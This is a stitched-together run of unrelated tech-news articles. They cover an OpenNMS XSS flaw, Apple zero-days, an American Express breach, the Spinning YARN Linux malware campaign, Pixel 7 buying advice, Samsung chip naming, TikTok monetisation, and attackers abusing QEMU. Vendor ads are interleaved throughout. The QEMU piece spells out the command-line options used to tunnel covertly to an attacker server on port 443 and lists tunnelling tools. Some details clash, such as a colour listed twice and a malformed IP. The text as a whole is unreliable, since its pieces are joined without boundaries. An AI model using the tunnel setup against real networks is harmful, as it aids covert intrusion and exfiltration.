A critical vulnerability in OpenNMS, a widely used network monitoring solution, has been identified, allowing attackers to inject malicious JavaScript payloads through a Cross-Site Scripting (XSS) flaw.
This vulnerability, tracked as CVE-2023-0846, has raised significant concerns due to its potential to compromise the security of networks monitored by OpenNMS.
The XSS flaw stems from improper sanitizing of user input within the OpenNMS web application.
Attackers can exploit this vulnerability by sending specially crafted data to the application, which then reflects the malicious script to the user’s browser without adequate validation.
This allows the attacker to execute arbitrary JavaScript code in the context of the victim’s session, potentially leading to session hijacking, data theft, and unauthorized actions on the application.
OpenNMS XSS Flaw
Exploiting this vulnerability is particularly concerning due to its simplicity and the ease with which attackers can leverage it.
DocumentIntegrate ANY.RUN in your company for Effective Malware Analysis
Malware analysis can be fast and simple. Just let us show you the way to:
Interact with malware safely
Set up virtual machine in Linux and all Windows OS versions
Work in a team
Get detailed reports with maximum data
If you want to test all these features now with completely free access to the sandbox: ..
The SonarSource report states that this payload is executed when an administrator views the alarm generated by the manipulated SNMP trap, granting the attacker access to the admin’s session and the broader network.
The impact of the XSS vulnerability is dramatically increased when combined with a command injection flaw in OpenNMS.
Attackers can use the XSS vulnerability to gain initial access and then exploit the command injection vulnerability to execute arbitrary code on the OpenNMS server.
This combination of vulnerabilities allows for a full compromise of the OpenNMS system, enabling attackers to manipulate network monitoring data, disrupt services, or gain unauthorized access to networked devices.
Impact on OpenNMS
The discovery of these vulnerabilities by SonarSource has prompted urgent action from the OpenNMS community.
The vulnerabilities were addressed in OpenNMS version 31.0.4, which includes fixes to prevent XSS attacks and command injection.
However, the presence of these vulnerabilities highlights the critical need for rigorous input validation and sanitization in network monitoring solutions.
Organizations using OpenNMS are strongly advised to update to the latest version to protect their networks from potential exploitation
XSS vulnerability in OpenNMS, especially when combined with a command injection flaw, represents a security risk.
It underscores the importance of continuous security assessment and prompt patching of vulnerabilities in critical infrastructure components like network monitoring systems.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
Apple has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities which are reported to already have been exploited. Zero-day vulnerabilities are discovered by attackers before the software company itself – meaning the vendor has ‘zero days’ to fix them.
Both the two vulnerabilities allow an attacker to bypass the memory protections that would normally stop someone from running malicious code. Reportedly, attackers used them with another unpatched vulnerability or malicious app, and the combination could be used to give them complete control over targeted iPhones.
The update is available for: iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later.
A patch for iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation, running iOS 16.7.6 or iPadOS 16.7.6 is available for one of the vulnerabilities.
To check if you’re using the latest software version, go to Settings > General > Software Update. You want to be on iOS 17.4 or iPadOS 17.4, so update now if you’re not. It’s also worth turning on Automatic Updates if you haven’t already. You can do that on the same screen.
Technical details
The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The zero-day CVEs patched in these updates are:
CVE-2024-23225: a memory corruption issue was addressed with improved validation. A patch is available for this issue in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple says it’s aware of a report that this issue may have seen active exploitation.
CVE-2024-23296: a memory corruption issue in RTKit was addressed with improved validation. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple says it’s aware of a report that this issue may have seen active exploitation.
RTKit is Apple’s real-time operating system, running on multiple chips in iPhone, Watch, MacBook, and peripherals like the iPod. A real-time operating system, is software that manages tasks on a single core, which is crucial for real-time applications that require precise timing.
Apple included several other vulnerabilities in the update, some of which it listed but it also mentions “Additional CVE entries coming soon.” For protection against attackers reverse engineering updates to find the vulnerabilities, Apple doesn’t disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available.
We don’t just report on phone security—we provide it
Google, through a recent case study, gave some insights into Meta’s internal processes about how it plans to deliver rapid app updates. The research showcased Meta’s capacity to make fast rollouts of its core apps such as Facebook, Instagram, Threads, and Messenger among others within just one to two months after the release of Android 14 AOSP.
Meta automates updates, blazing the trail for others
As explained by Android Central, this unprecedented speed in app updates is only exclusive to Meta. In fact, it took them only seven to nine months to align themselves with Android 12, making their strides toward targetSDK adoption very significant and four times faster.
The Android OS Readiness Program by Meta was among the key initiatives that facilitated this efficiency level. It expedited deployments by facilitating preparation, and testing of new operating system’s updates according to strategic goals. This program was the result of what Meta learned while overcoming Android 11 challenges characterized by slow developer tooling adoption and a decentralized app approach which made troubleshooting more complex.
SDK release preparation, automated by Meta, was part of the program that reduced the time required from three weeks to just three hours. This automation allowed Meta to quickly test new updates with each beta version of Android 14. The process of preparing releases in an accelerated manner for efficient testing and troubleshooting thus ensured timely updates for Facebook, Instagram, Threads, and Messenger.
Update automation to become mainstream in the future
It is a good sign that other companies can also use the update process adopted by Google and Meta. Google together with Meta intends to encourage other application developers to implement centralized development processes that are automatic. It will enable smaller teams of developers to speed up the process of release preparation, and users may be able to access optimized Android apps within the shortest period.
The optimized app delivery has become the forte of Meta’s development team. This success story from Meta points out how automating right can significantly reduce app update timelines, therefore setting a precedent for the entire app development community.
Several internet users have resorted to Google services for their online requirements in the aftermath of a recent Facebook outage. They were shocked to see that outages are also occurring with Google services, such as Gmail and YouTube. Numerous individuals are curious about what is happening and how it is influencing their everyday routines in light of this unexpected turn of events.
The impact of the outage
The internet community has been severely disrupted by the simultaneous outages of Google and Facebook services. These platforms are very important for communication, entertainment, and productivity for a large number of people and enterprises. People are having trouble keeping in touch with their loved ones, getting essential information, and doing their job duties because both Facebook and Google services are unavailable.
The widely used video-sharing platform, YouTube, is among the most negatively impacted services. Many people are still unable to access YouTube, which prevents content creators from uploading new videos and consumers from watching their favorite material. The YouTube community, who depend on the site for both pleasure and education, is now frustrated as a result.
The response from Google
Google has issued a statement in reaction to the outages. The company apologized for the inconvenience and promised consumers that they’re trying to find a swift solution. The IT behemoth has sent out its engineering team to look into the underlying causes of the issues and put the required changes in place. The timeframe for the complete restoration of services is yet unknown, despite their best efforts.
Although Google has not disclosed any precise information regarding the reason behind the outages, many people theorize that a server overload or technical malfunction may be to blame. Given the company’s reputation for dependability and strong infrastructure, many people were surprised by the extensive interruptions.
What users can do?
Users are encouraged to be patient and look into other platforms for their internet requirements in the interim. Social networking sites that allow users to maintain connections with one another, such as Instagram and Twitter, are still operational. Until the problems with Google services are fixed, customers may also think about using other email providers and video-sharing websites.
American Express has recently notified its customers of a data breach involving a third-party service provider, marking a security incident that has potentially compromised customer information.
This breach underscores the vulnerabilities that can arise from third-party partnerships, even when a company’s systems remain secure.
Here, we delve into the details of the breach, its impact on customers, and the response from American Express.
Data Breach Details
The breach occurred through a third-party service provider that is frequently used by American Express, particularly by the company’s travel services division.
DocumentIntegrate ANY.RUN in your company for Effective Malware Analysis
Malware analysis can be fast and simple. Just let us show you the way to:
Interact with malware safely
Set up virtual machine in Linux and all Windows OS versions
Work in a team
Get detailed reports with maximum data
If you want to test all these features now with completely free access to the sandbox: ..
It’s important to note that American Express’s systems were not directly compromised in this incident.
The breach was disclosed in a notification filed with the state of Massachusetts and involved unauthorized access to the third party’s system, which led to the exposure of American Express card account numbers, names, and expiration dates
Customers potentially affected by this breach have been warned that their account details, including card account numbers, names, and other information such as expiration dates, might have been compromised.
American Express has emphasized that it is monitoring accounts for fraudulent activity and has assured customers that they will not be held liable for any fraudulent charges on their accounts.
The company has advised customers to review their account statements carefully for any signs of fraudulent activity, especially over the next 12 to 24 months, and to enable notifications in the American Express Mobile app to stay updated on account activity
Company Response
In response to the breach, American Express has taken several steps to protect its customers and mitigate the impact.
The company is vigilantly monitoring affected accounts for signs of fraud and has provided customers with detailed instructions on how to protect their accounts.
These instructions include reviewing account statements, enabling notifications for suspicious activity, and ensuring that contact information is up to date.
American Express has also provided additional tips for protecting against fraud and identity theft, such as visiting the Federal Trade Commission (FTC) website for advice on safeguarding personal information
American Express has emphasized its commitment to protecting the privacy and security of customer information and expressed regret for any concern the breach may have caused.
The company has made it clear that it understands the paramount importance of security, especially in today’s environment, and is strongly committed to maintaining the trust of its customers.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.
Linux Users Beware: “Spinning YARN” Malware Campaign Targets Misconfigured Servers Running on Apache Hadoop YARN, Docker, Confluence and Redis.
Cado Security Labs has discovered an emerging Linux malware campaign dubbed Spinning Yarn targeting misconfigured servers running Apache Hadoop YARN, Docker, Confluence, and Redis web-facing services.
The emergence of the new Linux malware shouldn’t come as a surprise, given the recent surge in threats targeting Linux devices and servers. Just a couple of days ago, an old Linux malware known as Bifrost RAT resurfaced with a new variant that mimics VMware domains.
According to Cado Security’s research research shared with Hackread.com ahead of publication on Wednesday, Spinning Yarn is a malicious campaign that exploits weaknesses in popular Linux software used by businesses across various sectors.
These services are crucial components in organizations’ IT infrastructure. Docker is critical for developing, deploying, and managing containerized applications. Apache Hadoop allows distributed processing of large datasets. Redis, a widely used in-memory data store, helps in caching real-time applications, and Confluence allows collaboration and knowledge management.
By compromising these applications, attackers can gain unauthorized access to systems, steal sensitive data, disrupt operations, or deploy ransomware, posing a significant threat to servers and critical infrastructure.
In Spinning Yarn, threat actors have used several unique payloads, including four Golang binaries that automate the discovery and infection of hosts and let them exploit code. They use Confluence to exploit common misconfigurations and vulnerabilities, launching Remote Code Execution (RCE) attacks and infecting new hosts.
The attackers exploit CVE-2022-26134, an n-day vulnerability in Confluence, and deploy a container for the Docker compromise. The vulnerability has been exploited since 2022, including by Mirai malware variant V3G4 against IoT devices for DDoS attacks
Further probing revealed a series of shell scripts and standard Linux attack techniques used to deliver a cryptocurrency miner, spawn a reverse shell, and enable persistent access to compromised hosts. They also deploy an instance of the Platypus open-source reverse shell utility to maintain access.
In an attempt to evade detection, multiple user-mode rootkits are deployed. Researchers observed that the shell script payloads employed in this campaign share similarities with those used in previous cloud attacks.
In their blog post, Cado Security Labs detailed initial access activity on a docker Engine API honeypot on this IP address: 47966971. The attacker spawned a new container using Alpine Linux and created a bind mount for the underlying server’s root directory. This technique is common in Docker attacks, allowing attackers to write files to the host and execute a job for the Cron scheduler eventually achieving RCE.
In this campaign, the attacker wrote an executable and registered a Cron job to execute base64-encoded shell commands. Such extensive attack on Linux applications demonstrates attackers’ growing sophistication in targeting web-facing services in cloud environments, keeping abreast of vulnerabilities.
To mitigate the risks from campaigns like Spinning Yarn, regularly update software, enable strong passwords, educate employees on cybersecurity best practices, segment your network to limit potential damage, and deploy security solutions like endpoint security solutions and firewalls to detect and prevent malware infections. This will help protect against known vulnerabilities and ensure a secure environment.
UPDATE: Google is now rolling out a new Pixel Feature Drop update, for March 2024, and the Pixel 7 is one of the phones getting it. Read more about what it brings at the very end of the article.
Google announced two new smartphones today, the Pixel 7 and Pixel 7 Pro. These are basically the company’s new flagship smartphones, and direct successors to the Pixel 6 series. The company did not revamp the design completely this time around, but it did make some changes to differentiate this year’s lineup. Both devices come with better protection of the camera visor on the back, thanks to the metal cover on top of it.
The camera hardware did not see major changes compared to last year either, but there’s still plenty to talk about. We’ve already covered both phones extensively on the site, but if you want to grab a ton of information in a single article, this is the one. Here we’ll focus on the Pixel 7, the smaller of the two new flagships. If you’d like to know its price, specs, features, and so much more… read on.
How much does the Google Pixel 7 cost?
The Google Pixel 7 starts at $599. That basically means it has the same price as the Pixel 6 when it launched last year. That price applies for the 128GB storage option. There is a 256GB storage model on offer as well, and that variant will set you back $699. The device is available to pre-order starting today, by the way.
Should I wait for a price drop?
The Google Pixel 7 is priced more than fair considering the competition. Chances are it will not get a price drop anytime soon. So, if you’re planning to hold out on buying one just because you think you can get a discount in the near future, chances are that it won’t happen. If you’re interested in this phone, and you plan on buying a phone soon, our advice would be to go ahead and do it.
Where can I buy the Google Pixel 7?
The Google Pixel 7 is easy to come by in the US, you’ll find it in all the usual places that sell the Pixel. You can get it directly from the Google Store, or from Best Buy. You can also grab it from carriers, if you want. It will likely be available from AT&T, T-Mobile, and Verizon. You can also finance your Pixel 7 through Google Fi, and possibly the three aforementioned carriers. Do note that the carriers may also offer some special deals.
In the US, you can get up to $750 off any Pixel 7 phone with a qualifying trade-in. On top of that, Google is offering up to $200 in Google Store credit towards your next purchase.
What offers are available from AT&T?
AT&T has announced that new and existing AT&T customers can get a free Google Pixel 7, or up to $800 off the Pixel 7 Pro with eligible trade-ins. The company also said that users can take advantage of AT&T’s buy one Pixel Watch and get one free offer.
What offers are available from T-Mobile?
If you’d like to purchase the Pixel 7 from T-Mobile, you can get a $500 discount with a new line of service. You can get up to $800 off for the Pixel 7 Pro, but with a new or existing Magenta Max plan and an eligible trade-in.
What offers are available from Verizon?
Verizon is offer a free Pixel 7 with an eligible trade-in. Of course, the value of a trade-in will depend on what phone we’re talking about, and in what condition it is. Verizon does accept broken phones as well, though. Do note that you also must be on an eligible Unlimited plan for this. You can also grab a $100 discount on the Pixel Buds Pro, and 20% off on select cases and screen protectors.
What carriers support the Google Pixel 7?
When it comes to the US, all three major carriers support the Pixel 7. Namely, we’re talking about AT&T, T-Mobile, and Verizon. The device itself supports both mmWave and Sub-6 5G networks, so you’ll get proper 5G support regardless of which carrier you choose.
In addition to the aforementioned carriers, a ton of MVNOs also support the Pixel 7. That goes for Google Fi, Cricket, Metro by T-Mobile, Mint Mobile, Straight Talk, and more. Do note that not all of the will sell the phone, though, even though they will support it. You can simply grab it from Google, and opt for one of the MVNOs.
What colors are available?
The Google Pixel 7 comes in three color options. Those colors are Lemongrass, Obsidian Black, and Lemongrass.
The Lemongrass color is basically a very light white color, combined with a light gray frame and camera visor. The Obsidian Black color combines a black backplate, with a dark gray frame and camera visor. And last, but not least, the Snow color comes with a white backplate, and silver frame camera visor protection.
What are the specs of the Google Pixel 7?
Below are the specs for the Google Pixel 7, and next to it, you’ll notice specs for the Google Pixel 7 Pro, for comparison’s sake.
When it comes to software features, Google focused largely on camera features. Android 13 is well-known to everyone by now, and you’re getting all those goodies, along with a bunch of camera features that we’ll touch upon below.
Cinematic Blur
Cinematic Blur is one of the main new camera features on the Pixel 7 series devices. This is essentially Google’s version of Apple’s Cinematic Mode. It allows you to switch between two subjects, while keeping one focused, and the other blurred (the background one). This technique has been used in cinematography for a long time, and it can be useful on phones if you shoot specific types of videos.
Extreme Battery Saver
The Extreme Battery Saver is another feature Google is promoting for both Pixel phones. This feature basically shuts down all apps except those you select, and thus prolongs battery life considerably. The apps that don’t work will be grayed out on the display. Do note that system apps such as Phone, Messages, Clock, and Settings will remain active no matter what, you cannot disable those.
Photo Unblur
Photo Unblur is a brand new feature Google presented during its Pixel 7 series keynote. It can remove blur from images, basically make blurry images look great. Google did show some really impressive samples during the keynote.
Guided Frame
For people who are blind, or have poor vision, and like to take selfies, this is the feature to use. Guided Frame will give out audio instructions, haptic feedback, and offer high-contrast visual animations.
10-bit HDR videos
The Google Pixel 7 and Pixel 7 Pro also got 10-bit HDR support for video recording. You’ll now get higher contrast videos with wider color ranges.
What official cases are available?
With the Google Pixel 7, Google released a similar case as the one last year. That case comes in three color options, and Google used the same color names as for the devices themselves, well, for the most part. So, you have Lemongrass, Obsidian, and Snow Chalk options. These cases are a bit different than the ones last year. Google changed the physical button covers. Last year, the same material the case was made from covered the physical buttons, that’s no longer the case. This time around, the company included pieces of metal or plastic (either way, they have a metallic finish), to make these cases feel more premium, and offer more clickiness. You can check out all the color variants below, and take a closer look. These are the only official cases Google announced, and they’re priced at $29.99 each.
Google is offering various different, third-party cases through its website, though. You can get a leather case from Bellory, OtterBox’s Defender Series case, or a case from Case-Mate. Those are only some examples. Follow the link below and choose your own!
Google has released a new update for its Pixel phones, a security update for February 2024. One of the devices that is getting that update is the Pixel 7, of course. There are no specific entries for the Pixel 7a in the changelog, but there is one that targets all phones that the update is coming to. Google has released a fix for “stability or performance with certain third-party apps”.
Updated March 6, 2024:
As part of the Pixel Feature Drop update for March 2024, Google is making a couple of changes, and adding new features along the way. One of the most notable changes is an improved Call Screen feature. Your Pixel 7 will now be able to help you get the call on the way if the caller is silent. You’ll get a prompt from the Google Assistant to move things along.
The Pixel Feature Drop also improves Instagram compatibility. It enables you to capture and share 10-bit HDR videos directly on Instagram Reels. On top of that, you can also upload and share Ultra HDR photos to your Instagram feed.
This Pixel Feature Drop also delivered a Pixel 7 series-specific change. The Circle to Search function is finally available on Pixel 7 phones. All you have to do is summon Google Assistant, circle what you’re interested in, and there you go.
Samsung may have found an unconventional, perhaps misleading, way to beat TSMC to 2nm mass production. Rather than speeding up the development of its 2-nanometer semiconductor fabrication technology, the company plans to rename its 2nd-gen 3nm process 2nm. It will market chips based on the 2nd-gen 3nm process, expected to arrive later this year, as 2nm solutions. The “real” 2nm chips may debut in the second half of 2025.
Samsung to market its next-gen 3nm chips as 2nm
Samsung is the world’s first semiconductor foundry to begin 3nm mass production. It flipped the switch in mid-2022, with TSMC following a few months later. However, the latter went on to secure better yield rates and win major 3nm contracts. It has already produced a 3nm smartphone chip, Apple’s A17 Pro for the iPhone 15 Pro and iPhone 15 Pro Max. Samsung Foundry has yet to win 3nm manufacturing contracts from smartphone companies.
Since TSMC stuck with the older FinFET transistor architecture for its 3nm process, it might have helped the firm achieve better yields quickly. Samsung, on the other hand, upgraded to the more advanced GAA architecture and is struggling with yield. With TSMC surging ahead in the 3nm race, the Korean firm is now adopting a peculiar tactic that makes it look like it has outpaced its arch-rival in the 2nm development work.
According to ZDNet, Samsung has informed its partners and customers that its 2nd-gen 3nm process will be called 2nm from here on. “We have been informed by Samsung Electronics that they will change the 2nd generation 3-nano technology to 2-nano technology,” the publication quotes an official in the fabless semiconductor industry. The official confirmed that Samsung has rewritten 3nm contracts signed last year to reflect this change.
The report adds that Samsung’s recent agreement with the Japanese AI startup PFN (Preferred Networks) for 2nm chips is for 2nd-gen 3nm solutions. In other words, it has yet to secure a 2nm manufacturing contract in the true sense. This is extremely confusing and misleading. It is unclear why Samsung is doing this. More importantly, it remains to be seen what term the company uses to refer to its “real” 2nm chips.
Qualcomm has asked for 2nm samples from the two foundries
Samsung reportedly planned this change last year and is finally executing it. Perhaps reports about the company skipping the 3nm process and directly jumping to 2nm likely stemmed from this. Qualcomm recently requested 2nm samples from Samsung and TSMC. It will be interesting to see whether Samsung sends samples of its 2nd-gen 3nm process or the real 2nm solution. If it goes with the former process, TSMC might have something to say about it.
During its largest US creator summit, “For Creators: Future Formats Summit,” TikTok made some interesting announcements regarding creators and the many ways they can monetize their content.
For example, the social giant revealed that it will upgrade the Creator Portal to the Creator Academy. The change is meant to provide all creators with regularly updated resources, courses, articles, videos, and insights.
Currently, the Creator Academy is in testing, but the support tool will be available in the coming weeks in seven different languages, with more to come, which can be accessed in-app via Creator tools.
Another important TikTok change involves the Creativity Program. The feature was launched in beta last year as a way to help creators foster their creativity, generate higher revenue potential and unlock more opportunities.
This week, TikTok announced that in the coming weeks, the Creativity Program will be leaving beta with some improvements and a new name, Creator Rewards Program.
According to TikTok, the Creativity Program was a success, as total creator revenue increased by over 250 percent within the last 6 months, and the number of creators making $50,000 each month nearly doubled.
The upcoming Creator Rewards Program will continue to reward original content over a minute long with an optimized rewards formula focused on four key areas: originality, play duration, search value, and audience engagement.
Finally, TikTok announced plans to expand LIVE Subscription to make it available to non-LIVE creators on the social app. The feature will be known as Subscription going forward and it will be initially available to invite-only creators. Eligible creators will be able to sign up to access this feature in the coming weeks.
QEMU is an open-source platform that provides a secure and private virtualized space for trying out malicious codes, exploits, and attacks on their own environments.
This controlled testing ground minimizes the risk of detection and legal matters.
Moreover, QEMU permits hackers to develop malware that can run across different hardware architectures and operating systems.
Cybersecurity researchers at Kaspersky Labs recently discovered that hackers are abusing the QEMU hardware emulator to exfiltrate stolen data covertly.
QEMU Hardware Emulator
Attackers love using genuine tools in order to avoid detection but also to reduce malware expenditure.
Data exfiltration, drive encryption, remote execution, and memory dumping are some of the network scanning activities that trusted software supports.
Pre-installed malware or employee-mimicking RDP/VPN access acts as footholds through compromised systems.
Network tunnels and port forwarding utilities enable users to bypass NAT and firewalls, thus gaining entry into the internal system.
Numerous tools exist for creating network tunnels between systems, some direct, others using proxies to mask attacker IPs.
These utilities frequently surfaced during researchers’ incident response efforts over the past three years.
Here below we have mentioned the tools:-
Stowaway
ligolo
3proxy
dog-tunnel
chisel
FRP
ngrok
gs-netcat
plink
iox
nps
Experts uncovered suspicious activity in a company’s system during a recent investigation. Among the tools detected were Angry IP Scanner, mimikatz, and QEMU.
The presence of QEMU puzzled security analysts – why would attackers use a virtualizer? Further analysis revealed an unusual QEMU execution command line without a LiveCD or disk image.
Here below we have mentioned all the arguments:-
m 1M: Allocated only 1MB RAM, which is insufficient for most OSes.
netdev user,id=lan,restrict=off: Created virtual network interface ‘lan’ to communicate externally, without restrictions.
netdev socket,id=sock,connect=<IP>:443: Socket interface ‘sock’ connected to remote server at <IP>:443.
netdev hubport,id=port-lan/port-sock,hubid=0,netdev=lan/sock: Added ports to virtual hub linked to ‘lan’ and ‘sock’ interfaces.
nographic: Started QEMU in non-GUI console mode.
The external <IP> raised suspicions, and QEMU allows VM interconnections via -netdev options by creating network backends.
Network tunnel (Source – Securelist)
Experts used QEMU to build a Kali Linux VM on AttackerServer. The VM was connected through a socket adapter and listened on port 443.
PivotHost had another QEMU instance that connected to the socket over AttackerServer’s port 443.
The user adapter was conjoined via the hub with the socket. The adversary’s QEMU options were imitated.
QEMU set up a PivotHost-AttackerServer tunnel to enable subnet scans from PivotHost to the Kali VM.
QEMU does not encrypt tunneled traffic, as it sends unencrypted encapsulated packets. The packet data contains the Ethernet frame size and frame.
Removing headers can obtain intercepted traffic. However, threat actors also use legitimate tools ingeniously.
Multi-level protection with endpoint and network monitoring by SOC experts is crucial for timely rarity detection and attack blocking. While the MDR service can detect suspicious QEMU activity.
You can block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, with Perimeter81 malware protection. All are incredibly harmful, can wreak havoc, and damage your network.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter
.webp)